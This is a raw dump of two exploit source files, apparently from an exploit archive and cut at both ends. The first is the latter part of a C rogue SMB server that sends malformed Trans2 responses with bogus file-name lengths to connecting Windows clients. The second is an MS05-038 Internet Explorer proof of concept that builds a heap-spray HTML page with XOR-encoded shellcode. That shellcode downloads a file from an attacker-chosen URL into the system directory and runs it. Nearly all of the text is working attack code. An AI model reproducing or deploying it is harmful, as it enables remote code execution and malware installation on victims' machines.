ID: 0"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38""\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00""\x30\x00\x00\x00\x02\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00\x00\x00\x05\x00\x00\x00";unsigned char CloseKey[] ="\x00\x00\x00\x68""\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38""\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00""\x30\x00\x00\x00\x03\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00";unsigned char NetBios1[] ="\x00\x00\x00\x94""\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x0a\x00\x00\x5c\x00\x00\x00\x00\x00\x38\x00\x00\x00\x5c\x00\x38""\x00\x00\x00\x00\x00\x5d\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00""\x5c\x00\x00\x00\x01\x00\x00\x00\x44\x00\x00\x00\x00\x00\x00\x00""\x01\x00\x00\x00\xc0\xa2\x16\x00\xae\xc2\x16\x00\x00\x00\x00\x00""\xbe\xc2\x16\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00""\x6e\x00\x65\x00\x74\x00\x62\x00\x69\x00\x6f\x00\x73\x00\x00\x00""\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x2e\x00""\x00\x00\x00\x00";unsigned char NetBios2[] ="\x00\x00\x00\x3e""\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x07\xff\x00\x3e\x00\x01\x00\xff\x01\x00\x00\xff\x01\x00\x00\x0d""\x00\x41\x3a\x00\x4e\x00\x54\x00\x46\x00\x53\x00\x00\x00";// Trans2 Response, QUERY_PATH_INFOunsigned char Trans2Response1[] ="\x00\x00\x00\x64""\xff\x53\x4d\x42" // SMB"\x32" // SMB Command: Trans2 (0x32)"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)"\x98" // Flags: 0x98"\x07\xc8" // Flags2 : 0xc807"\x00\x00" // Process ID High: 0"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000"\x00\x00" // Reserved: 0000"\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x0a" // Word Count (WCT): 10"\x02\x00" // Total Parameter Count: 2"\x28\x00" // Total Data Count: 40"\x00\x00" // Reserved: 0000"\x02\x00" // Parameter Count: 2"\x38\x00" // Parameter Offset: 56"\x00\x00" // Parameter Displacement: 0"\x28\x00" // Data Count: 40"\x3c\x00" // Data Offset: 60"\x00\x00" // Data Displacement: 0"\x00" // Setup Count: 0"\x00" // Reserved: 00"\x2d\x00" // Byte Count (BCC): 45"\x00" // Padding: 00"\x00\x00" // EA Error offset: 0"\x00\x01" // Padding: 0001"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000"\x8c\x24\xba\x5c\x3a\x73\xc5\x01" // Last Access: Jun 17, 2005 05:44:55.092750000"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change: Jun 17, 2005 05:39:25.717750000"\x10\x00\x00\x00" // File Attributes: 0x00000010"\x00\x00\x00\x00"; // Unknown Data: 00000000// Trans2 Response, QUERY_PATH_INFOunsigned char Trans2Response2[] = // ERROR Response"\x00\x00\x00\x23""\xff\x53\x4d\x42\x32\x34\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x00\x00\x00";// Trans2 Response, FIND_FIRST2, Files: . ..unsigned char Trans2Response3[] ="\x00\x00\x01\x0c""\xff\x53\x4d\x42" // SMB"\x32" // SMB Command: Trans2 (0x32)"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)"\x98" // Flags: 0x98"\x07\xc8" // Flags2 : 0xc807"\x00\x00" // Process ID High: 0"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000"\x00\x00" // Reserved: 0000"\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x0a" // Word Count (WCT): 10"\x0a\x00" // Total Parameter Count: 10"\xc8\x00" // Total Data Count: 200"\x00\x00" // Reserved: 0000"\x0a\x00" // Parameter Count: 10"\x38\x00" // Parameter Offset: 56"\x00\x00" // Parameter Displacement: 0"\xc8\x00" // Data Count: 200"\x44\x00" // Data Offset: 68"\x00\x00" // Data Displacement: 0"\x00" // Setup Count: 0"\x00" // Reserved: 00"\xd5\x00" // Byte Count (BCC): 213"\x00" // Padding: 00"\x01\x08" // Search ID: 0x0801"\x02\x00" // Seatch Count: 2"\x01\x00" // End of Search: 1"\x00\x00" // EA Error offset: 0"\x60\x00" // Last Name offset: 96"\x38\x00" // Padding: 3800"\x60\x00\x00\x00" // Next Entry offset: 96"\x00\x00\x00\x00" // File Index: 0"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000"\xac\x09\x3c\xae\x39\x73\xc5\x01" // Last Access: Jun 17, 2005 05:40:02.342750000"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change: Jun 17, 2005 05:39:25.717750000"\x00\x00\x00\x00\x00\x00\x00\x00" // End of File: 0"\x00\x00\x00\x00\x00\x00\x00\x00" // Allocation Size: 0"\x10\x00\x00\x00" // File Attributes: 0x00000010//"\x02\x00\x00\x00" // File Name Len: 2"\xff\xff\xff\xff" // Bad File Name Len"\x00\x00\x00\x00" // EA List Length: 0//"\x00" // Short File Name Len: 0"\xff" // Bad Short File Name Len"\x00" // Reserved: 00"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:"\x2e\x00" // File Name: ."\x00\x00\x00\x00" // Next Entry Offset: 0"\x00\x00\x00\x00" // File Index: 0"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000"\xac\x09\x3c\xae\x39\x73\xc5\x01" // Last Access: Jun 17, 2005 05:40:02.342750000"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change: Jun 17, 2005 05:39:25.717750000"\x00\x00\x00\x00\x00\x00\x00\x00" // End Of File: 0"\x00\x00\x00\x00\x00\x00\x00\x00" // Allocation Size: 0"\x10\x00\x00\x00" // File Attributes: 0x00000010"\x04\x00\x00\x00" // File Name Len: 4"\x00\x00\x00\x00" // EA List Length: 0"\x00" // Short File Name Len: 0"\x00" // Reserved: 00"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:"\x2e\x00\x2e\x00" // File Name: .."\x00\x00\x00\x00\x00\x00"; // Unknown Data: 000000000000intcheck_interface ( char* str ){int i, j, wks = 0, srv = 0, spl = 0, wrg = 0, foo = 0;//Interface UUIDunsigned char wks_uuid[] = "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a";unsigned char srv_uuid[] = "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88";unsigned char spl_uuid[] = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab";unsigned char wrg_uuid[] = "\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03";for ( i = 0; i < 16; i++ ){j = 0;if ( str[120 + i] < 0 ){if ( ( str[120 + i] + 0x100 ) == wks_uuid[i] ){ wks++; j = 1; }if ( ( str[120 + i] + 0x100 ) == srv_uuid[i] ){ srv++; j = 1; }if ( ( str[120 + i] + 0x100 ) == spl_uuid[i] ){ spl++; j = 1; }if ( ( str[120 + i] + 0x100 ) == wrg_uuid[i] ){ wrg++; j = 1; }if ( j == 0 )foo++;}else{if ( str[120 + i] == wks_uuid[i] ){ wks++; j = 1; }if ( str[120 + i] == srv_uuid[i] ){ srv++; j = 1; }if ( str[120 + i] == spl_uuid[i] ){ spl++; j = 1; }if ( str[120 + i] == wrg_uuid[i] ){ wrg++; j = 1; }if ( j == 0 )foo++;}}if ( wks == 16 )return ( 0 );else if ( srv == 16 )return ( 1 );else if ( spl == 16 )return ( 2 );else if ( wrg == 16 )return ( 3 );else{printf ( "there is/are %d invalid byte(s) in the interface UUID!\n", foo );return ( -1 );}}voidneg ( int s ){char response[1024];bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );send ( s, SmbNeg, sizeof ( SmbNeg ) -1, 0 );}voidsessionsetup ( int s, unsigned long userid, unsigned long treeid, int option ){char response[1024];unsigned char ntlm_challenge1[] = "\xa2\x75\x1b\x10\xe7\x62\xb0\xc3";unsigned char ntlm_challenge2[] = "\xe1\xed\x43\x66\xc7\xa7\x36\xbd";bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "SessionSetupAndXNeg\n" );SessionSetupAndXNeg[30] = response[30];SessionSetupAndXNeg[31] = response[31];SessionSetupAndXNeg[34] = response[34];SessionSetupAndXNeg[35] = response[35];strncpy ( SessionSetupAndXNeg + 32, ( unsigned char* ) &userid, 2 );if ( option == 0 )memcpy ( SessionSetupAndXNeg + 71, ntlm_challenge1, 8 );elsememcpy ( SessionSetupAndXNeg + 71, ntlm_challenge2, 8 );send ( s, SessionSetupAndXNeg, sizeof ( SessionSetupAndXNeg ) -1, 0 );bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "SessionSetupAndXAuth\n" );SessionSetupAndXAuth[30] = response[30];SessionSetupAndXAuth[31] = response[31];SessionSetupAndXAuth[34] = response[34];SessionSetupAndXAuth[35] = response[35];strncpy ( SessionSetupAndXAuth + 32, ( unsigned char* ) &userid, 2 );send ( s, SessionSetupAndXAuth, sizeof ( SessionSetupAndXAuth ) -1, 0 );bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "TreeConnectAndX\n" );TreeConnectAndX[30] = response[30];TreeConnectAndX[31] = response[31];TreeConnectAndX[34] = response[34];TreeConnectAndX[35] = response[35];strncpy ( TreeConnectAndX + 28, ( unsigned char* ) &treeid, 2 );strncpy ( TreeConnectAndX + 32, ( unsigned char* ) &userid, 2 );send ( s, TreeConnectAndX, sizeof ( TreeConnectAndX ) -1, 0 );}voiddigg ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid, int option ){int ret;char response[1024];unsigned char srv[] = "\x73\x72\x76";unsigned char wks[] = "\x77\x6b\x73";bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "SmbNtCreate\n" );SmbNtCreate[30] = response[30];SmbNtCreate[31] = response[31];SmbNtCreate[34] = response[34];SmbNtCreate[35] = response[35];strncpy ( SmbNtCreate + 28, ( unsigned char* ) &treeid, 2 );strncpy ( SmbNtCreate + 32, ( unsigned char* ) &userid, 2 );strncpy ( SmbNtCreate + 42, ( unsigned char* ) &fid, 2 );send ( s, SmbNtCreate, sizeof ( SmbNtCreate ) -1, 0 );bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "DceRpc\n" );DceRpc[30] = response[30];DceRpc[31] = response[31];DceRpc[34] = response[34];DceRpc[35] = response[35];strncpy ( DceRpc + 28, ( unsigned char* ) &treeid, 2 );strncpy ( DceRpc + 32, ( unsigned char* ) &userid, 2 );strncpy ( DceRpc + 80, ( unsigned char* ) &assocgroup, 2 );ret = check_interface ( response );if ( ret == 0 )memcpy ( DceRpc + 92, wks, 3 );else if ( ret == 1 )memcpy ( DceRpc + 92, srv, 3 );else if ( ret == 2 );else if ( ret == 3 );else{printf ( "invalid interface uuid, aborting...\n" );exit ( 1 );}send ( s, DceRpc, sizeof ( DceRpc ) -1, 0 );bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );if ( option == 1 ){printf ( "NetrShareEnum\n" );NetrShareEnum[30] = response[30];NetrShareEnum[31] = response[31];NetrShareEnum[34] = response[34];NetrShareEnum[35] = response[35];strncpy ( NetrShareEnum + 28, ( unsigned char* ) &treeid, 2 );strncpy ( NetrShareEnum + 32, ( unsigned char* ) &userid, 2 );send ( s, NetrShareEnum, sizeof ( NetrShareEnum ) -1, 0 );}else if ( ( option == 2 ) && ( ret == 2 ) ){printf ( "OpenPrinterEx\n" );OpenPrinterEx[30] = response[30];OpenPrinterEx[31] = response[31];OpenPrinterEx[34] = response[34];OpenPrinterEx[35] = response[35];strncpy ( OpenPrinterEx + 28, ( unsigned char* ) &treeid, 2 );strncpy ( OpenPrinterEx + 32, ( unsigned char* ) &userid, 2 );send ( s, OpenPrinterEx, sizeof ( OpenPrinterEx ) -1, 0 );bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "ClosePrinter\n" );ClosePrinter[30] = response[30];ClosePrinter[31] = response[31];ClosePrinter[34] = response[34];ClosePrinter[35] = response[35];strncpy ( ClosePrinter + 28, ( unsigned char* ) &treeid, 2 );strncpy ( ClosePrinter + 32, ( unsigned char* ) &userid, 2 );send ( s, ClosePrinter, sizeof ( ClosePrinter ) -1, 0 );}else if ( ( option == 3 ) && ( ret == 3 ) ){printf ( "OpenHklm\n" );OpenHklm[30] = response[30];OpenHklm[31] = response[31];OpenHklm[34] = response[34];OpenHklm[35] = response[35];strncpy ( OpenHklm + 28, ( unsigned char* ) &treeid, 2 );strncpy ( OpenHklm + 32, ( unsigned char* ) &userid, 2 );send ( s, OpenHklm, sizeof ( OpenHklm ) -1, 0 );bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "OpenKey\n" );OpenKey[30] = response[30];OpenKey[31] = response[31];OpenKey[34] = response[34];OpenKey[35] = response[35];strncpy ( OpenKey + 28, ( unsigned char* ) &treeid, 2 );strncpy ( OpenKey + 32, ( unsigned char* ) &userid, 2 );send ( s, OpenKey, sizeof ( OpenKey ) -1, 0 );bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "CloseKey\n" );CloseKey[30] = response[30];CloseKey[31] = response[31];CloseKey[34] = response[34];CloseKey[35] = response[35];strncpy ( CloseKey + 28, ( unsigned char* ) &treeid, 2 );strncpy ( CloseKey + 32, ( unsigned char* ) &userid, 2 );send ( s, CloseKey, sizeof ( CloseKey ) -1, 0 );}else if ( option == 4 ){printf ( "NetBios1\n" );NetBios1[30] = response[30];NetBios1[31] = response[31];NetBios1[34] = response[34];NetBios1[35] = response[35];strncpy ( NetBios1 + 28, ( unsigned char* ) &treeid, 2 );strncpy ( NetBios1 + 32, ( unsigned char* ) &userid, 2 );send ( s, NetBios1, sizeof ( NetBios1 ) -1, 0 );}else{if ( ret == 0 ){printf ( "WksSvc\n" );WksSvc[30] = response[30];WksSvc[31] = response[31];WksSvc[34] = response[34];WksSvc[35] = response[35];strncpy ( WksSvc + 28, ( unsigned char* ) &treeid, 2 );strncpy ( WksSvc + 32, ( unsigned char* ) &userid, 2 );send ( s, WksSvc, sizeof ( WksSvc ) -1, 0 );}else{printf ( "SrvSvc\n" );SrvSvc[30] = response[30];SrvSvc[31] = response[31];SrvSvc[34] = response[34];SrvSvc[35] = response[35];strncpy ( SrvSvc + 28, ( unsigned char* ) &treeid, 2 );strncpy ( SrvSvc + 32, ( unsigned char* ) &userid, 2 );send ( s, SrvSvc, sizeof ( SrvSvc ) -1, 0 );}}bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "SmbClose\n" );SmbClose[30] = response[30];SmbClose[31] = response[31];SmbClose[34] = response[34];SmbClose[35] = response[35];strncpy ( SmbClose + 28, ( unsigned char* ) &treeid, 2 );strncpy ( SmbClose + 32, ( unsigned char* ) &userid, 2 );send ( s, SmbClose, sizeof ( SmbClose ) -1, 0 );}voidexploit ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid ){char response[1024];bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "NetBios2\n" );NetBios2[30] = response[30];NetBios2[31] = response[31];NetBios2[34] = response[34];NetBios2[35] = response[35];strncpy ( NetBios2 + 28, ( unsigned char* ) &treeid, 2 );strncpy ( NetBios2 + 32, ( unsigned char* ) &userid, 2 );send ( s, NetBios2, sizeof ( NetBios2 ) -1, 0 );bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "Trans2Response1\n" );Trans2Response1[30] = response[30];Trans2Response1[31] = response[31];Trans2Response1[34] = response[34];Trans2Response1[35] = response[35];strncpy ( Trans2Response1 + 28, ( unsigned char* ) &treeid, 2 );strncpy ( Trans2Response1 + 32, ( unsigned char* ) &userid, 2 );send ( s, Trans2Response1, sizeof ( Trans2Response1 ) -1, 0 );bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "Trans2Response2\n" );Trans2Response2[30] = response[30];Trans2Response2[31] = response[31];Trans2Response2[34] = response[34];Trans2Response2[35] = response[35];strncpy ( Trans2Response2 + 28, ( unsigned char* ) &treeid, 2 );strncpy ( Trans2Response2 + 32, ( unsigned char* ) &userid, 2 );send ( s, Trans2Response2, sizeof ( Trans2Response2 ) -1, 0 );bzero ( &response, sizeof ( response ) );recv ( s, response, sizeof ( response ) -1, 0 );printf ( "Trans2Response3\n" );Trans2Response3[30] = response[30];Trans2Response3[31] = response[31];Trans2Response3[34] = response[34];Trans2Response3[35] = response[35];strncpy ( Trans2Response3 + 28, ( unsigned char* ) &treeid, 2 );strncpy ( Trans2Response3 + 32, ( unsigned char* ) &userid, 2 );send ( s, Trans2Response3, sizeof ( Trans2Response3 ) -1, 0 );}intmain ( int argc, char* argv[] ){int s1, s2, i;unsigned long fid = 0x1337;unsigned long treeid = 0x0808;unsigned long userid = 0x0808;unsigned long assocgroup = 0x4756;pid_t childpid;socklen_t clilen;struct sockaddr_in cliaddr, servaddr;bzero ( &servaddr, sizeof ( servaddr ) );servaddr.sin_family = AF_INET;servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );servaddr.sin_port = htons ( PORT );s1 = socket ( AF_INET, SOCK_STREAM, 0 );bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );listen ( s1, 1 );clilen = sizeof ( cliaddr );s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen );close ( s1 );printf ( "\n%s\n\n", inet_ntoa ( cliaddr.sin_addr ) );neg ( s2 ); // Negotiatesessionsetup ( s2, userid, treeid, 0 ); // SessionSetupfor ( i = 0; i < 15; i++ ){digg ( s2, fid, assocgroup, userid, treeid, 0 );fid++;assocgroup ++;}digg ( s2, fid, assocgroup, userid, treeid, 1 ); // NetrShareEnumfid++;assocgroup ++;digg ( s2, fid, assocgroup, userid, treeid, 2 ); // spoolssfid++;assocgroup ++;for ( i = 0; i < 4; i++ ){digg ( s2, fid, assocgroup, userid, treeid, 0 );fid++;assocgroup ++;}digg ( s2, fid, assocgroup, userid, treeid, 3 ); // WinReguserid++;treeid++;sessionsetup ( s2, userid, treeid, 1 ); // SessionSetupuserid--;treeid--;for ( i = 0; i < 2; i++ ){digg ( s2, fid, assocgroup, userid, treeid, 4 ); // NetBiosfid++;assocgroup ++;}treeid += 2;exploit ( s2, fid, assocgroup, userid, treeid );printf ( "done!\n" );close ( s2 );}
-
Microsoft Internet Explorer COM Objects File Download Exploit (MS05-038) /*+++++++++++++++++++++++++++++++++++++++++++++++Ms05 038 exploit POCWrite By ZwelL2005 8 11[url="http://www.donews.com/404.html code belongs to Lion(cnhonker), regards to him.This code tested on Windows 2003-----------------------------------------------*/#include <stdio.h>#include <winsock2.h>#pragma comment(lib, "ws2_32")// Use for find the ASM code#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90\__asm _emit 0x90 __asm _emit 0x90\__asm _emit 0x90 __asm _emit 0x90\__asm _emit 0x90 __asm _emit 0x90#define PROC_END PROC_BEGIN#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90"#define SEARCH_LEN 8#define MAX_SC_LEN 2048#define HASH_KEY 13// Define Decode Parameter#define DECODE_LEN 21#define SC_LEN_OFFSET 7#define ENC_KEY_OFFSET 11#define ENC_KEY 0xff// Define Function Addr#define ADDR_LoadLibraryA [esi]#define ADDR_GetSystemDirectoryA [esi+4]#define ADDR_WinExec [esi+8]#define ADDR_ExitProcess [esi+12]#define ADDR_URLDownloadToFileA [esi+16]// Need functionsunsigned char functions[100][128] = { // [esi] stack layout// kernel32 4 // 00 kernel32.dll{"LoadLibraryA"}, // [esi]{"GetSystemDirectoryA"}, // [esi+4]{"WinExec"}, // [esi+8] {"ExitProcess"}, // [esi+12]// urlmon 1 // 01 urlmon.dll{"URLDownloadToFileA"}, // [esi+16] {""},};// Shellcode stringunsigned char sc[1024] = {0};unsigned int Sc_len;char *htmlbody1="<html><body>\r\n""<script language=\"javascript\">\r\n""shellcode = unescape(\"%u4343%u4343\"+\"";char *htmlbody2="\");\r\n""bigblock = unescape(\"%u0D0D%u0D0D\");\r\n""headersize = 20;\r\n""slackspace = headersize+shellcode.length;\r\n""while (bigblock.length<slackspace) bigblock+=bigblock;\r\n""fillblock = bigblock.substring(0, slackspace);\r\n""block = bigblock.substring(0, bigblock.length-slackspace);\r\n""while(block.length+slackspace<0x40000) block = block+block+fillblock;\r\n""memory = new Array();\r\n""for (i=0;i<750;i++) memory[i] = block + shellcode;\r\n""</SCRIPT>\r\n""<object classid=\"CLSID:083863F1-70DE-11d0-BD40-00A0C911CE86\"></object>\r\n""Ms05038 Exploit POC<br>\r\n""Made By ZwelL< [url="http://www.donews.com/404.html ASM shellcode main functionvoid ShellCode();// Get function hashstatic DWORD __stdcall GetHash ( char *c ){DWORD h = 0;while ( *c ){__asm ror h, HASH_KEYh += *c++;}return( h );}int buildfile(unsigned char *sc, int len){int i;char writebuf[4096];char tmp[4096];FILE *stream;memset(tmp, 0, 4096);memset(writebuf, 0, 4096);for(i = 0; i < len; i++){sprintf(writebuf, "%s%.2x", writebuf, sc[i] & 0xff);}if(strlen(writebuf)%4!=0)strcat(writebuf, "00");for(i=0; i<(strlen(writebuf)/4); i++){strcat(tmp, "\%u");strncat(tmp, &writebuf[i*4+2], 2);strncat(tmp, &writebuf[i*4], 2);}//printf("%s\n", writebuf);//printf("======================\n%s\n", tmp);if( (stream = fopen( "zwell_ms05038.html", "w+b" )) != NULL ){fwrite(htmlbody1, strlen(htmlbody1), 1, stream);fwrite( tmp, strlen(tmp), 1, stream );fwrite(htmlbody2, strlen(htmlbody2), 1, stream);fclose(stream);}else{printf("fopen wrong\n");exit(0);}return 0;}void Make_ShellCode(char *url1){unsigned char *pSc_addr;unsigned int Enc_key=ENC_KEY;unsigned long dwHash[100];unsigned int dwHashSize;int i,j,k,l;// Get functions hash//printf("[+] Get functions hash strings.\r\n");for (i=0;;i++){if (functions[i][0] == '\x0') break;dwHash[i] = GetHash((char*)functions[i]);//printf("\t%.8X\t%s\n", dwHash[i], functions[i]);}dwHashSize = i*4;// Deal with shellcodepSc_addr = (unsigned char *)ShellCode;for (k=0;k<MAX_SC_LEN;++k ){if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0){break;}}pSc_addr+=(k+SEARCH_LEN); // Start of the ShellCodefor (k=0;k<MAX_SC_LEN;++k){if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) {break;}}Sc_len=k; // Length of the ShellCodememcpy(sc, pSc_addr, Sc_len); // Copy shellcode to sc[]// Add functions hashmemcpy(sc+Sc_len, (char *)dwHash, dwHashSize);Sc_len += dwHashSize;// Add urlmemcpy(sc+Sc_len, url1, strlen(url1)+1); Sc_len += strlen(url1)+1; // Deal with find the right XOR bytefor(i=0xff; i>0; i--){l = 0;for(j=DECODE_LEN; j<Sc_len; j++){if (((sc[j] ^ i) == 0x26) || //%((sc[j] ^ i) == 0x3d) || //=((sc[j] ^ i) == 0x3f) || //?((sc[j] ^ i) == 0x40) || //@((sc[j] ^ i) == 0x00) ||((sc[j] ^ i) == 0x0D) ||((sc[j] ^ i) == 0x0A)) // Define Bad Characters{l++; // If found the right XOR byte,l equals 0break;};}if (l==0){Enc_key = i;//printf("[+] Find XOR Byte: 0x%02X\n", i);for(j=DECODE_LEN; j<Sc_len; j++){sc[j] ^= Enc_key;}break; // If found the right XOR byte, Break}}// Deal with not found XOR byteif (l!=0){printf("[-] No xor byte found!\r\n");exit(-1);}// Deal with DeCode string*(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len;*(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key;printf("[+] download url:%s\n", url1);}int help(){printf("Usage : ms05038.exe url [-t] \n");printf(" the 't' option will let you test for the shellcode first\n");exit(0);}void main(int argc, char **argv){WSADATA wsa;unsigned char url[255]={0};BOOL b_test;printf("\n========================================\n");printf("Ms05-038 exploit POC\n");printf("Write By Zwell\n");printf("2005-8-11\n");printf("http://http://www.donews.com/404.html;);printf("zwell@sohu.com\n");printf("========================================\n\n");b_test=FALSE;if(argc<2)help();strncpy(url, argv[1], 255);if(argc == 3)if(!strcmp(argv[2], "-t"))b_test = TRUE;WSAStartup(MAKEWORD(2,2),&wsa);Make_ShellCode(url);printf("[+] Build shellcode successful\n");buildfile(sc, Sc_len);printf("[+] Build file successful\n");printf("Now, you can open the builded file(zwell_ms05038.html) with IE to see the result.Good Luck \n");if(b_test){printf("Testing the shellcode...\n");((void (*)(void)) &sc)();}return;}// ShellCode functionvoid ShellCode(){__asm{PROC_BEGIN // C macro to begin proc//--------------------------------------------------------------------//// DeCode////--------------------------------------------------------------------jmp short decode_enddecode_start:pop ebx // Decode start addr (esp -> ebx)dec ebxxor ecx,ecxmov cl,0xFF // Decode lendecode_loop:xor byte ptr [ebx+ecx],ENC_KEY // Decode keyloop decode_loopjmp short decode_okdecode_end:call decode_startdecode_ok://--------------------------------------------------------------------//// ShellCode////--------------------------------------------------------------------jmp sc_endsc_start: pop edi // Hash string start addr (esp -> edi)// Get kernel32.dll base addrmov eax, fs:0x30 // PEBmov eax, [eax+0x0c] // PROCESS_MODULE_INFOmov esi, [eax+0x1c] // InInitOrder.flinklodsd // eax = InInitOrder.blinkmov ebp, [eax+8] // ebp = kernel32.dll base addressmov esi, edi // Hash string start addr -> esi// Get function addr of kernel32push 4pop ecxgetkernel32:call GetProcAddress_funloop getkernel32// Get function addr of urlmon push 0x00006e6fpush 0x6d6c7275 // urlmonpush espcall ADDR_LoadLibraryA // LoadLibraryA("urlmon");mov ebp, eax // ebp = urlmon.dll base address/*push 1pop ecxgeturlmon:call GetProcAddress_funloop geturlmon*/call GetProcAddress_fun// url start addr = edi//LGetSystemDirectoryA:sub esp, 0x20mov ebx, esppush 0x20push ebxcall ADDR_GetSystemDirectoryA // GetSystemDirectoryA//LURLDownloadToFileA: // eax = system path size// URLDownloadToFileA url save to a.exemov dword ptr [ebx+eax], 0x652E615C // "\a.e"mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe"xor eax, eaxpush eaxpush eaxpush ebx // %systemdir%\a.exepush edi // urlpush eaxcall ADDR_URLDownloadToFileA // URLDownloadToFileA//LWinExec:mov ebx, esppush eaxpush ebxcall ADDR_WinExec // WinExec(%systemdir%\a.exe);Finished://push 1call ADDR_ExitProcess // ExitProcess();GetProcAddress_fun: push ecxpush esimov esi, [ebp+0x3C] // e_lfanewmov esi, [esi+ebp+0x78] // ExportDirectory RVAadd esi, ebp // rva2vapush esimov esi, [esi+0x20] // AddressOfNames RVAadd esi, ebp // rva2vaxor ecx, ecxdec ecxfind_start:inc ecxlodsdadd eax, ebpxor ebx, ebxhash_loop:movsx edx, byte ptr [eax]cmp dl, dhjz short find_addrror ebx, HASH_KEY // hash keyadd ebx, edxinc eaxjmp short hash_loopfind_addr:cmp ebx, [edi] // compare to 